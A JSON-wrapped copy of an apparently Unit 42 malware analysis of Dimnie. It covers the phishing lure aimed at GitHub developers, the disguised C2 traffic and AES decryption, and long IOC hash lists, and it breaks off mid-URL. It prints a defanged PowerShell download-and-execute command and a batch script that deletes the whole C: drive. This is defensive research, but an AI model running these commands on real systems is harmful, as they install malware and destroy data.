{
	"id": "b423c1a2-9797-4ba8-9ba7-e0fd7e23b762",
	"created_at": "2026-04-06T00:14:51.670676Z",
	"updated_at": "2026-04-10T03:21:12.463175Z",
	"deleted_at": null,
	"sha1_hash": "200ff5d67f1ef5daebe43a808410039c47fa3c51",
	"title": "Dimnie: Hiding in Plain Sight",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1100367,
	"plain_text": "Dimnie: Hiding in Plain Sight\r\nBy Brandon Levene, Dominik Reichel, Esmid Idrizovic\r\nPublished: 2017-03-28 · Archived: 2026-04-02 12:30:05 UTC\r\nA note to readers: The code samples included within this blog post may trigger alerts from your security software.\r\nPlease note that this does not indicate an infection or an attack; rather, it is a notification that the code could be\r\nmalicious if it were live.\r\nIntroduction\r\nIn mid-January of 2017 Unit 42 researchers became aware of reports of open-source developers receiving malicious\r\nemails. Multiple owners of Github repositories received phishing emails like the one below:\r\nHello,\r\nMy name is Adam Buchbinder, I saw your GitHub repo and i'm pretty amazed.\r\nThe point is that i have an open position in my company and looks like you\r\nare a good fit.\r\nPlease take a look into attachment to find details about company and job.\r\nDont hesitate to contact me directly via email highlighted in the document below.\r\nThanks and regards,\r\nAdam.\r\nThough there were multiple waves of messages following a similar tactic, each one carried the same malicious .doc file\r\nas an attachment (SHA256: 6b9af3290723f081e090cd29113c8755696dca88f06d072dd75bf5560ca9408e). This file\r\ncontained embedded macro code that executed a commonly observed PowerShell command to download and execute a\r\nfile.\r\nFigure 1. The attackers used  a common technique to try to avoid static detection by introducing characters which the\r\nWindows shell will ignore but static engines will typically see as part of the string.\r\nA more readable version of the PowerShell code is shown below:\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 1 of 40\n\ncmd.exe /c \"powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object\r\nsystem.net.webclient).downloadfile('hxxp://nicklovegrove.co[.]uk/wp-content/margin2601_onechat_word.exe','%appdata%.exe');start-process '%appdata%.exe'\"\r\nOn initial inspection, everything appears to follow the same formula as many “traditional” malware campaigns: e-mail\r\nlure, malicious attachment, macro, PowerShell downloader, and finally a binary payload (SHA256:\r\n3f73b09d9cdd100929061d8590ef0bc01b47999f47fa024f57c28dcd660e7c22). Examining the payload’s communications\r\ncaused us to raise our eyebrows.\r\nDimnie, the commonly agreed upon name for the binary dropped by the PowerShell script above, has been around for\r\nseveral years. Palo Alto Networks has observed samples dating back to early 2014 with identical command and control\r\nmechanisms. The malware family serves as a downloader and has a modular design encompassing various information\r\nstealing functionalities. Each module is injected into the memory of core Windows processes, further complicating\r\nanalysis. During its lifespan, it appears to have undergone few changes and its stealthy command and control methods\r\ncombined with a previously Russian focused target base has allowed it to fly under the radar up until this most recent\r\ncampaign.\r\nHidden Requests\r\nLet us dive right in and have a look at a typical HTTP request from Dimnie to its command and control infrastructure.\r\nFigure 2. Initial HTTP GET request from the compromised client and the server's reply. The HTTP payload is truncated\r\nin this image.\r\nDoes this malware use a (now-defunct) Google service to aid its initial phone home? Not quite. Examining the HTTP\r\nrequest, this appears to be an HTTP Proxy request, as described by RFC2616:\r\nThe absoluteURI form is REQUIRED when the request is being made to a proxy. The proxy is requested to\r\nforward the request or service it from a valid cache, and return the response. Note that the proxy MAY\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 2 of 40\n\nforward the request on to another proxy or directly to the serverspecified by the absoluteURI. In order to\r\navoid request loops, a proxy MUST be able to recognize all of its server names, including any aliases, local\r\nvariations, and the numeric IP address. An example Request-Line would be:GET\r\nhttp://www.w3.org/pub/WWW/TheProject.html HTTP/1.1To allow for transition to absoluteURIs in all\r\nrequests in future versions of HTTP, all HTTP/1.1 servers MUST accept the absoluteURI form in requests,\r\neven though HTTP/1.1 clients will only generate them in requests to proxies.\r\nDimnie uses this feature to create a supposedly legit HTTP proxy request to a Google service. However, the Google\r\nPageRank service (toolbarqueries.google.com) has been slowly phased out since 2013 and as of 2016 is no longer open\r\nto the public. Therefore, the absolute URI in the HTTP request is for a non-existent service and the server is not acting as\r\na proxy. This seemingly RFC compliant request is merely camouflage.\r\nWe know what it isn't, so we will dive deeper to figure out what is happening underneath the camouflage layer. Start by\r\nhaving a look at the DNS request that immediately preceded this HTTP GET request.\r\nFigure 3. DNS request issued prior to the HTTP request above.\r\nIt looks pretty normal, but we can see an authoritative nameserver returning an IP address, 176.9.81[.]4, which is\r\nhighlighted in the image below.\r\nFigure 4. Nameserver responds to a Type A query with a valid response.\r\nWhile it may not seem so at first glance, this DNS query is related to the initial GET request to Google. Below is the raw\r\nhex of the IP header of the HTTP request above:\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 3 of 40\n\nFigure 5. Raw Hex of the IP Header from the HTTP GET request for Dimnie's initial phone home.\r\nThe answer (176.9.81[.]4) from the initial DNS request for onechat[.]pw is used as the destination IP for the follow up\r\nHTTP request that appears to connect to toolbarqueries.google.com. Sending the request to an entirely different server is\r\nnot complicated to achieve, but how many analysts would simply see a DNS request with no [apparent] related\r\nsubsequent traffic? That is precisely what Dimnie is relying upon to evade detections.\r\nWhat the GET?\r\nSince we have established the HTTP GET request to be largely falsified for camouflage purposes, we can now proceed\r\nto pick apart the initial outbound HTTP traffic. The contents of the HTTP GET parameter are reproduced below:\r\nGET http://toolbarqueries.google.com/search?sourceid=navclient-ff\u0026features=Rank\u0026client=navclient-auto-ff\u0026ch=fYQAcgUGKQ04yy+39O6k0IxaeU9Bgw81C6ft2+OPISgD8VPCj5hkCilXUZraPNCm\u0026q=info:google.com\r\nHTTP/1.1\r\nThis GET request contains a single piece of data used by the malware: the contents of the \"ch\" parameter which is\r\nbase64 encoded.\r\nfYQAcgUGKQ04yy+39O6k0IxaeU9Bgw81C6ft2+OPISgD8VPCj5hkCilXUZraPNCm\r\nDecoding the \"ch\" parameter yields us a AES key which Dimnie uses to decrypt payloads. The attacker uses AES 256 in\r\nECB mode to encrypt payloads which are push to a compromised host and decrypted.\r\nThe code below illustrates, in Python, the method we used to derive this key.\r\n\u003e\u003e\u003e import binascii\r\n\u003e\u003e\u003e import base64\r\n\u003e\u003e\u003e from Crypto.Cipher import AES\r\n\u003e\u003e\u003e a = \"fYQAcgUGKQ04yy+39O6k0IxaeU9Bgw81C6ft2+OPISgD8VPCj5hkCilXUZraPNCm\"\r\n\u003e\u003e\u003e b = base64.b64decode(a)\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 4 of 40\n\n\u003e\u003e\u003e decryptor = AES.new('\\0' *32, AES.MODE_ECB)\r\n\u003e\u003e\u003e c = decryptor.decrypt(b)\r\n\u003e\u003e\u003e binascii.hexlify(c)\r\n'cda59f1670cf48bf0000000011217350b14b3f2d4c6001006fb3b0fb00000000adf1de43000000000000000000000000'\r\n\u003e\u003e\u003e key = c[4:8] + ('\\0' * 28)\r\n\u003e\u003e\u003e binascii.hexlify(key)\r\n'70cf48bf00000000000000000000000000000000000000000000000000000000'\r\nBesides the HTTP payload, which is an AES 256 ECB encrypted PE file (after decrypting, SHA256:\r\n6173d2f1d7bdea5f6fe199d39bbefa575230c5a6c52b08925ff4693106518adf), the server reply contains only one other\r\nHTTP header that seems to be used by the malware; the Cookie value sent back from the C2 server. This Cookie is a 48\r\nbyte, base64 encoded, AES 256 ECB encrypted series of UINT32 values pertaining to the payload (when requested) or\r\noutbound data (HTTP POSTs, see next section) as can be seen below (comments appended after //.)\r\nstruct DimnieInformation\r\n{\r\n    UINT32      dwUnknown1;     // 0x00:\r\n    UINT32      dwAesKey;       // 0x04: Final AES encryption key is: Key + (28 * '\\0')\r\n    UINT32      dwUnknown3;     // 0x08: Not used for encryption.\r\n    UINT32      dwUnknown4;     // 0x0C:\r\n    UINT32      dwUnknown5;     // 0x10: Can be subtracted with dwUnknown1 if higher than 0 but unknown use.\r\n    UINT32      dwUnknown6;     // 0x14:\r\n    UINT32      dwKey2;         // 0x18: Not used for encryption.\r\n    UINT32      dwFileSize;     // 0x1C: File size if file has been downloaded.\r\n    UINT32      dwUnknown9      // 0x20: Can be subtracted with dwUnknown1 if higher than 0 but unknown use.\r\n    UINT32      dwType;         // 0x24: Type of sent/received data.\r\n    UINT32      dwCRC;          // 0x28: CRC of the received data.\r\n    UINT32      dwModuleID;     // 0x2C: Module ID of the downloaded module\r\n};\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 5 of 40\n\nHere is a list of possible types which may be found at offset 0x24:\r\nValue Description\r\n0x00000000 Main PE module received.\r\n0x00000001 16 byte information sent to C2, probably PING/PONG.\r\n0x00000002 PE Module received.\r\n0x000003a4 Get module.\r\n0x000003a6 Get main module.\r\n0x00002000 Running process.\r\n0x00003000 PC Information (Computer name, language, network card, …)\r\n0x00038000 Keylogger data\r\n0x00058000 Screenshots in PNG.\r\n0x00018000 Unknown.\r\n0x00098000 Unknown.\r\n0x00418000 Unknown.\r\n0x00118000 Unknown.\r\n0x00218000 Unknown.\r\n0x00818000 Unknown.\r\n0x02000000 Unknown.\r\nThe values contain a preset, defined size for the payload as well as an expected CRC32 value. Effectively, the Cookie\r\nparameter is used to verify the payload's integrity during the module downloader portion of the malware's lifecycle.\r\nWhen the Cookie value is included in later C2 traffic, it is primarily used to identify the type of data being sent back to\r\nthe server and the reporting module.\r\nMore Camouflage\r\nData exfiltration by the associated modules is performed using HTTP POST requests to another Google domain,\r\ngmail[.]com. However, just like the module downloader portion of the malware, these HTTP requests are hardcoded to\r\nbe sent to an attacker controlled server. Again, Dimnie attempts to blend in by looking at least somewhat legitimate,\r\nalthough the data exfiltration traffic is far less convincing than that of the module downloads.\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 6 of 40\n\nFigure 6. HTTP POST request with encrypted data.\r\nOnce again, the data is appended to an image header and encrypted using AES 256 in ECB mode. The Cookie value\r\nfollows the same structure provided in the previous section. This initial push contains system information as can be seen\r\nin the decrypted output below (data enclosed in brackets has been edited):\r\n[netbios name]\r\nWORKGROUP\r\n2\r\nHomeGroupUser$\r\n[Hostname]\r\n[Language]\r\n1\r\n10.0.2.15 (08-00-27-D9-83-51) 'Intel(R) PRO/1000 MT-Desktopadapter'\r\nPCI\\VEN_8086\u0026DEV_100E\u0026SUBSYS_001E8086\u0026REV_02\\3\u0026267A616A\u00260\u002618\r\n4\r\nAdministrator (0x10203)\r\n[Username] (0x10223)\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 7 of 40\n\nHomeGroupUser$ (0x10201)\r\n[Hostname] (0x10221)\r\nDuring our analysis, we identified follow on POST requests containing screenshots of the compromised desktop and\r\nprocess activity lists which were encrypted and appended to a false JPEG header as described previously.\r\nFigure 7. Process activity list, post-decryption.\r\nDecoding the Traffic\r\nNow that we understand how Dimnie retrieves its modules and how it protects them, we can use the derived AES key to\r\ndecode the observed payloads from our PCAP data. The payloads themselves are never written to disk as they are\r\ndownloaded and subsequently injected directly into memory. The module ID is stored at offset 0x2C as a 32 byte value\r\nin the Cookie field, however to calculate the \"true\" module ID we must use the following formula using the key found at\r\noffset 0x04 in the cookie: uModuleID = uID – uKey. Below is a table of observed module IDs, their functions, and type\r\nof information as referenced by the Cookie Header (at offset 0x24):\r\nModule\r\nID\r\nFunction Information Value\r\n0x20001 Main module: downloads other modules and injects them into memory. N/A\r\n0x20002 DLL module which exports SvcMain and is injected into another process. N/A\r\n0x20003\r\nContains 58 bytes in front of the DOS header. Purpose unknown. Appears\r\nto be a copy of the main module.\r\nN/A\r\n0x20004 Extracts PC information and sends it back to C2. 0x03000\r\n0x20005 Enumerates running processes and sends the list back to the C2. 0x2000\r\n0x20006\r\nModule that can logkey strokes, take screenshots, interact with smartcards\r\nand more. Uses RegisterRawInputDevices/GetRawInputData for logging\r\nkeys.\r\n 0x38000, 0x418000,\r\n0x818000, 0x98000,\r\n0x118000, 0x218000,\r\n0x58000\r\n0x20007\r\nKeylogger module which has two PE files appended. Both PE files contain\r\nthe same functionality but are different architecture (x86 and x64). It sends\r\nback the logged keys and clipboard data to the C2\r\n0x38000\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 8 of 40\n\n0x20008 Module that can take screenshots and send them back to the C2. 0x58000\r\n0x20009 Self-destruct module which deletes all files on the C:\\ Drive. 0x02000000\r\nThe self-destruct module, 0x20009, drops and executes the following batch script:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n@echo off\r\nTitle System need to reboot computer!\r\ncolor 0c\r\nEcho Auto Starting in 5 seconds\r\n@ping 127.0.0.1 -n 5 -w 1000 \u003e nul\r\n@ping 127.0.0.1 -n %1% -w 1000 \u003e nul\r\ncls\r\nColor 0e\r\nEcho delete disk C\r\ndel C:\\\\ /s /q\r\n@ping 127.0.0.1 -n 3 -w 1000 \u003e nul\r\n@ping 127.0.0.1 -n %1% -w 1000 \u003e nul\r\ncls\r\ncolor 0c\r\nEcho Remove directory\r\nRd C:\\\\ /s /q\r\n@ping 127.0.0.1 -n 3 -w 1000 \u003e nul\r\n@ping 127.0.0.1 -n %1% -w 1000 \u003e nul\r\ncls\r\nMsg * \\SYSTEM ERROR!HARDDRIVE IS OUT OF ORDER!\\;\r\nThe primary purpose of the modules we’ve observed observed is information stealing and reconnaissance. It should be\r\nnoted that Dimnie's modular framework allows for a variety of capabilities to be accessed by its operators, thus the\r\nmodules observed during the analyzed campaign may not encompass all available functionality.\r\nConclusion\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 9 of 40\n\nThe global reach of the January 2017 campaign which we analyzed in this post is a marked departure from previous\r\nDimnie targeting tactics. Multiple factors have contributed to Dimnie's relatively long-lived existence. By masking\r\nupload and download network traffic as innocuous user activity, Dimnie has taken advantage of defenders' assumptions\r\nabout what normal traffic looks like. This blending in tactic, combined with a prior penchant for targeting systems used\r\nby Russian speakers, likely allowed Dimnie to remain relatively unknown.\r\nCustomers are protected by IPS, Dimnie is detected as malware by Wildfire, and Autofocus customers can see related\r\nsamples using the Dimnie tag.\r\nWe are also including IOCs for this malware family dating back to 2014 which include domains from DNS lookups\r\n(Appendix A) and dropper hashes (Appendix B). IOCs specifically mentioned in this post are included in the next\r\nsection.\r\nIOCs Mentioned in this Report\r\nWe’ve purposefully omitted legitimate domains and IPs from this listing.\r\nInitial Phishing Email: b70a17d21ec6552e884f01db47b4e0aa08776a6542883d144b9836d5c9912065\r\nMalicious .doc file: 6b9af3290723f081e090cd29113c8755696dca88f06d072dd75bf5560ca9408e,\r\nDimnie loader: 3f73b09d9cdd100929061d8590ef0bc01b47999f47fa024f57c28dcd660e7c22,\r\nSample decrypted main module:  6173d2f1d7bdea5f6fe199d39bbefa575230c5a6c52b08925ff4693106518adf\r\nAppendix A: Associated SHA256 Hashes\r\n15895f99011f466f2ddfa8345478b2387762d98eecf2ada51ad7f70618406ba1\r\n7d8ec31d9d98802e9b1ebc49c4b300fa901934b3d2d602fa36cc5d7c5d24b3bc\r\n046bc7347a66c977a89ba693307f881b0c3568314bb7ffd952c8705a2ff9bf9d\r\n1b5e57fa264b2ce145b39f9fc2279b21f6b212aeca8eaa27f68cdcdbdef1900f\r\n4b10cc374ed9e2c69231fcfa1b1d96496785ecf148f9445192f24385068e7b0c\r\ne47ce23ec14114d3abeba090baa77b9bec876f947df67076dddb9087387735c7\r\nd99c699e399afcd9e5abcff8c9b4a40af3e428f0c452c646653c79ec1a623bba\r\nb6dc94f75ea4d2b46cf41079b1ac4cf48fe7786019396f379822fe6e21c9929d\r\na4df4a25e847d95a86a257bef7d2b349e9908bec37f0199f9f217d9cc0e28564\r\ncaba117fdf3ca61b1b17121adb4546e829df5426ab8944e5c4672f4a8619d0fe\r\n3ffec5efb775c7d977f1e0ad1e8a51a111394e0ed113f58809fc8441b2c0f731\r\n3d94881f0125093576dd01cd54cfd937cdca2b3050ad9aa4c5db2514d9aa686c\r\n1d06464bafd24c228fd66df9cbf8feceda1346cef8648c2cd87cf617547bbe1e\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 10 of 40\n\n9c403782571042fe2e3efb3acc35a26867956235a2a9472798bd664b65698c3a\r\nd0eaec396ae11110dc4f51f3340d4735790876510de438f8a161577c7aa72d1e\r\n222beafedbb604d200099cee657505f1d11b371403c7c9c12103adf28a561289\r\n0f76bcda668095a8d2fe7a1282d463dcf04201e1c5a35856f117703bcd9428ef\r\nc4bc691d7b8a16ff68ed338878451d1ba681aa181922cabd0b999b935ded673e\r\n67a1dead18afc43c69a97de3e39bd84dec91df751a45bbda7ac5874f746c147c\r\n7c4c2c898f611fd12a244822f5a2080da51126713d4ed1b3c950aa0ba6f92d93\r\n67df79166bb258e77959c326c21563ea41f3f119d8e8486043efb83c868e636f\r\n5661e7c23ed6058157b39ed29fa37690148d377b1faa7c7b89024daf0ef7e904\r\nbbe7abc992928a45b618fbd7fbdd472ec3e4a47126f21ec38ad8257afe0c091f\r\n05e30073cbd18b0ff2cfeab307e2e8cd2226d921a1872f17fcc312fc601fa93e\r\n4a25bf18783ad32e08aaff0707d8fdae88647da4e0bfd22d83850e0dfa4ab148\r\n3109724914f0eec8ee5167b15e43fc71e58106983ad0d2137c96239d5b25ad7c\r\nc333173687879f3a6387f5afd915d9a4f042ffeb96f4cdf4514a5433de558f6f\r\n071d91e67c42811d96d15a4a6dff740cc5d704ca352d9bc03778a2a6abd552f4\r\nd884ae7b4f88973d2fb763b00c41171353310696e66dcde5733558ca68cd68d5\r\n3944c7586e17399051785e1ae0311f4b98e74825291249a784428a64a80240e5\r\nf76fe0b83e45a77ebc36ab12a27a5cf49be74fb154c51cb793e946c45bc4e12f\r\n9f2367e31987327ef5710f7dcbfa089382c1967247c5ac1e2342e1e10e495fb5\r\n5f45450f3342fd4f7f08651d58f775d47a25a44758039a577811eed6c094dfa7\r\n824b93c4662cdc072488cf82d34569dd27d6f1fced5cb83f045825ed2e4b463c\r\n441b1db0595565ac059552790e96524851843b22787238291f286b16c9c951d4\r\nba6022401ed257f82b7107319a7ec928044acd3dcb60dfab1ac7df2823ffef25\r\n0a5c9818aa579082af224abc02dad60d77f4ded6533d143100b7744b58e289a2\r\n871cefc4f9faf8658804dbe8332e3b511172ea29545e13c303ae1809edf8a0f6\r\nbf3869e420ac8686b9ae3b14d679f45b34909ff998887f9fd0c8126853d6a4ed\r\n8eef688751eed591bedd2fcc18d32bb84df11fdda62a16c963561aeeae56f6f4\r\nc18775abf5c992cbd9b3b0c401fb0ee66bbe092e44b0b1b3cdd17fdc353d825e\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 11 of 40\n\nea6a8a46b61e2a8813c4146461e4c961dfb2cbcf277d8bb9edfc14be73f9f073\r\n119972c1029267df7c5a8e607a2f034e7f8a3396ea49c67430842e0ff2de70eb\r\n488c93d2e5413b974f489030c1f7484d2a6610cda0dd5a389b6a30371817d108\r\n4ebb33fcf64afcd534ac83e72e49a4392b586bd31ef20b7bea2717cb9cde4928\r\na8779654e5abf142aaaca29b1abc0cbf1f5430e8a8fe7d955ae3ba6f1a9a3747\r\n445e1aaa68169f30efa3d7d04f378c646abbbb3515430005b66d9e9ac182006c\r\n417d6ec4701da0396bdffb8da0d582dabde35dedf9d468bcbe36f94df6dcf8e3\r\n8a4748311e74cbf4f66a55ee4561728d0542929e9c260eda6d30bbde054fa53c\r\n6a71582fb919a1300b98b035eb154602bf5452ff80d364a1f6603240cdbd8293\r\nb01756a3f4b8d687a9fce4301f5f56b4dfb7befe29550096b262935f63f02cc4\r\nb91fbf574bf080af82cd24977d00205dc0860ad7afb01f8f4a0ce0f910f9de6e\r\n829797843357a5417f4de7b7f8f970ccfaccf30ecc80ed9c15e796897012d3e5\r\nb10a1189aeb784c899bb5eb46b6cf1528b2ef6e3c0673159db4438e7aa39f6d7\r\n2ba2491ce6a1814206dfe2aa9b1129f6085f1a18fd9b8c831caad286b095ee90\r\n78961c49fa961bac01ebc8ef62077bc8fc8a3389f39fd7ee9d655447f0282fe2\r\naaa1511a156a11cff7e09367184972c067b65cae6573a8b4844dbe0a01894118\r\ne64678633c8e876fc9313bfe5a8401953eaefdd8e7e006221cd5009f471fc389\r\n2cedcdaa116feed52819914db3f19edf58c004a4a28c62f556d2ce3ced84b0f6\r\n417addbd5817cc9dcf4f77f6240a56cd11a94c9a89e646d589e5ed26710cbcac\r\nff19d4f2c6527b2d4ecf65fa85115fddaec5420ef4346e1b6a21b28ccc5604b5\r\n6e676f6be660799fbb4037c0c1ad39f9933b3e84cba0642fb7b892465b87325b\r\nf9531a1ca3ee933812b709cc07a7d6ab6f8ee9900eee64ad97e936a68c5847e5\r\ndf56d66b8d9a16258a0b449084e3d82f8e338f0d0ff140bbcec1848357107dda\r\n81ff2560c2f999d51f45b62110a5d37921a94d1af47f694780f9df8ed6c932ca\r\nf9e6817f348cbfc4ca672ea275f3da390c31b45266e57b1f0f13f7c7ca37a3eb\r\neda0dfc38e7f32efe209902e653553a231de906b3a8894d31c3e39bd3a7e3a99\r\n567cce05449594ed622160b443e81fb9e38989d830749d9e8bb5853f73226d11\r\n62b8b1c425bce735789ab19b7e520304d85005df418221eb0f9b242d9e671a45\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 12 of 40\n\n03766d99a1d7551ac4056c121c017ae70443d50c152ec1b06249c891baed435a\r\n1d0a9d2e3c08f54b95575e4341f1d9699eb29ddbcf45757b1814ceabc9418a03\r\n7dcda64fdfb2069f3b5f5047cfac6f2abfb6a2fb7591f974e5c0348ae86b6909\r\n913589ca3fa86f9de6582204040753c779dd830e33876de338683587d7498766\r\n590a4dedb34956e454d384e882440e731d50a83a819cfef000596d165a7d32c5\r\nd0b44b803893fc08c08c653b2e0ca2ca2e2f52ef8cd49f0ac145337af5b2175f\r\ncc74ef19129d061ba97801839ff04c00df07f684ff62df89061d7694c3a9c244\r\n302b0b3731f86facb6be3fbe8eadf18d00d696175fc1590fc012b9c90fd60de6\r\nbf4b6f9f28166c0c6916548694a09f98ab5e4e9c3012323b3a5fb3e6a6b33d9e\r\nb857f5244e18fa9efc9b820dc70b827674f28bcea9ab7ef666e2271f0de4c9ef\r\n0a46ce6d1d54fed2b200622ad0d5977e00e7865fe26c4cc69efa573e1ae542ad\r\n10b8eaae1e00dfb40186a1d32f0c3cc10a47b9258afbbbdd81569b96b2c79a07\r\n7b23f7c1ca90affc891ac89d6c9b592e0c47f1a539b9e8a87f6431fc0158404f\r\ncc8585b57a9a371fb6d7250395bdcddca07150a7dd97c3a9dd67e408812feb8e\r\n35074e717332d8fe3336448c8cf065bab56b978819b4685e618b094674be06df\r\na60c52336dc58251b28fba6345f75236bd7cf82c19702fa777fc926f04a5f75f\r\n0bf94cbf7120ba5810c24772ba9752d22a31129cbed2009ebbed5bce18c916d5\r\n052e93c7733e1a1fc5094682ab3cc3324b838d5260a1bed899ff93ef0966608c\r\n3a9ec7a665475ca2f8e4eb314a3b845a727b3a99a818263284604b76b1857960\r\n30d40c80ead9fd48b39aeee9c6f9d38951470d16bbe2bac09107d66f197cf012\r\ne91c5056fc764bea87cc5a265a18c93140420ac15b030fa061f4e54e453d6c1e\r\n5893e01e6ac20cfa75f184d1f6d708e3ccb3ff6da9f5183da415e3126e4d84b7\r\n2d9b959ad8e19d2dd1d60e1bcbcfb014fcd9d671316b310d864fb2d881c16462\r\n770c79684d74bdf8fb6d0d7cf138ddd06fdf7506e91eab09d79ded677f04ab98\r\n98bbf1b17196a525e810689833dae910b144daf8ce85f31c73b9d0ca2dbdc426\r\n0c760dc72a02073921d696840c31a372648a9f964be0afc0bd14554cb3a6be61\r\n66f3b47798a56b74517094038862ce1a4555e5c975427db3b00835377cc26725\r\n21e406638bffc35ad1929c5b03a0bbd42d1a39fb481d1954e0c15135e01e3c6e\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 13 of 40\n\n01431670bfa2a14419323ba4731e2b9f03d9bc7362ae78b06792eb605249ff0f\r\n517db060d4b0d8ae3a22d37f67311d9f5e2bf93d07424a4b9be5fefe84c571e6\r\n3eb15bd22b9c70cfaa57a08eccb60de60e6bdaba00489ad0c61139504ec1b274\r\ncc7b1846fa441c13cc03a8089013c55fd8c7bbabde049cf578df2633afebabff\r\neb47d187d81488b11690ac3191ad8e17774d8a11e559d692fcc344a905c34183\r\n7f8c517b0873991b320d3f94e76f639afadf1481550c8931bae2b46afe204aa9\r\n414475578f2d5642be77f2ea18df1f3ea97fc78a5b985944076c41f8b6e3fa54\r\na9fc88b00fe9ba84397aa7eba29a3dcc34da69a2eb89d9135cbfc04725605703\r\nd390f1198f1b0c2307859b523a8fca918994c48cc630bff60f1b1fe159f974cb\r\nfa56be12aec3eae896d372839d20bb02f45a8f167cfb44ca9b9e517f8bf454c5\r\n8f0cf083af5412a8c228fe8d7755c2dd186248bf73de5db693019a0435de7dad\r\ne593d990025104eeacc1bf48c3cf02a9f4503b056e6f17806dbc82e66f1878cc\r\n6764806968caeec57f239584098f45eb4cdf1c1610d1a85b5c065bd4a3682fd9\r\n63aa7d6759523c216de2bc85621f34d2a08f6c3c9dea8f4d3e0d1eae28afecdb\r\n4a8336797a98e2f74062a477cf88a1c6be603102a3ead70d69823c5d3306536a\r\n0595605bb8b6f4369e04be003c8de77d60d51c676bf463452758f0441c3dddac\r\n611f0f92151aef878550ca0cbfb98433180607f374f5b68b72393a3d43f65381\r\n7e275e43f70ac7962e5f4b503521af1862ac86ac8952aad52f7ff8452463b6d4\r\nfd7f3195d0b9530131c5860e5db4755f9bf95c5cdc2b1c5563be5f49b0d35857\r\n2fee7fbabcf1b4381ec3c8ef951bcdf9e204b9d8418815cc84efdd909a882413\r\nf423bf186440e7ac1924a75bf3c532d61d62592d664e7bb004c10881fda3bade\r\n3e21da2bfb27dc428214f94f6424b3d745e5590df45f333ad1f20552afbd410a\r\n7ccdecd7997e78e766e2eddc1dd0d5b2a0ff8d601a7acaddf024c0fc2f4204dc\r\nfc9b309039e083e390627f8203b6428a51ab570b3839a1e1efcc4b2855803fab\r\na1ca4464b092f361ae6c0bf60867c93fb507ca3f9c6de045979d708997539a7f\r\n8e6d0b88a84ce804938ea9b5c41b0ed497ce00b070ce0b596913b4dc65501352\r\n2aefd28e364b92ea42573d5f937ec53bd864e73cd8b7d40da27cbda2c6f9592a\r\n86bd7d9187a273a9b0082ca84fcfec05d7f7ad5fe03360533004eadd64a86017\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 14 of 40\n\n20b1853bec49af02aff6cd22b2c25e41a48df7a2cfbff785f6a110eff8742f6b\r\nbeb5a1afc328ab2f34f56a65ff4161d37be91adecfceaa83a2bc20b63fd35eed\r\n3998a7feb58bc3f4741b9585ecdad04b1d16026ba116630c0d7b69f2651a9ec8\r\n82fc70f991759e53daa66f2cc4f0873426049215b073973365341b000fa26585\r\n2acff0e4efcf15d9b21f15869b955cfafa8f188d7e38de52c729c260d3cffc4c\r\n9aa03d7f128678225dcdde8b8f8a792b7d56c768afde401a7ee779469a469271\r\n03262308f43830db8fa4c3568aee387df5de96743c287bc6b49bea309b2dc373\r\n95637e684a42583be98f3c1d2567cb5bdc3e7fcb875f054b58b1036f32834ada\r\nf3ac0db23744528e8169c1bc58c844b0fdfa4129c5e8700b4bffb07daa75d1e4\r\ne38804084d5cb0e7e80fd9144ed012dc92e89b68586dc2611ee90392d2fe46f7\r\n6a1999cd18373653766b9385c3e60a3f21ffa040180172eb206142f601384d76\r\n85176e6b449dc548af04c29fe13e8622c275c84691d449d6392607013f6fce07\r\nd653637357b94b8547f5d81e78248c5f7dec8f64a3f7918563c1b5fa9086b3e8\r\n97ee5dc97b2d21d299034cb02cc814a63494a31689afa3be9e47015b40b8b308\r\nb1f47264a60d732ad917770406badcfaa3b845d85841c46b27ea758ee82f18c2\r\n201480d3fe6598cb7557c4940e5db96e71de9a15364b19865ee61c11658e2b5b\r\ned9f3dba0c9a987094d1921e5316398aea169bf907ce848d6518ea40db15c46d\r\nc2ba05bbebb35e99780c87e23a3d6f7b05ffcb17b21ee27f05fb62ec13e25b0e\r\nabc4b46a96f432605336dbe376a92feeb77d768c473d52b725a853a3abeae92c\r\nb2eae31ae2fecf69a5940e5e7d3ec90b241bd1223a4af25204676b67a176c88c\r\n2d2c65e64f18e38991c609ca7d16cafb928c5c96132fe8f361dc3f31473b93f7\r\n5750fcf5b4e31fcab9e81f154e1ec04105dd909f46ffdb9bcb986d7da9e6c22b\r\n8ab4e92cd37cda1273f2359ec8d2c4b9cc4cf02faa199f8fe71f4f200a3ab31d\r\nc693c3983f3c6e2e20d338ba240ff7411121a674b267ff86914156f9a91d5be4\r\ncc05d4bffba7464194bf25ef5f8dfe9541048404b29e31fa93392663b1873501\r\n375005db3906b1aad931c0207932ccdc99a191e9ceb100ae364ee1f2ca15682d\r\nf9b85d337aeba34d23cbe1340f596cc908f572cbeeb5fed4fb389d779c7d5004\r\n941007ae7918e8eb1845598053cf7fc4b0c17d708c2dbd1d1b13d2dc12b138e1\r\nhttp://researchcent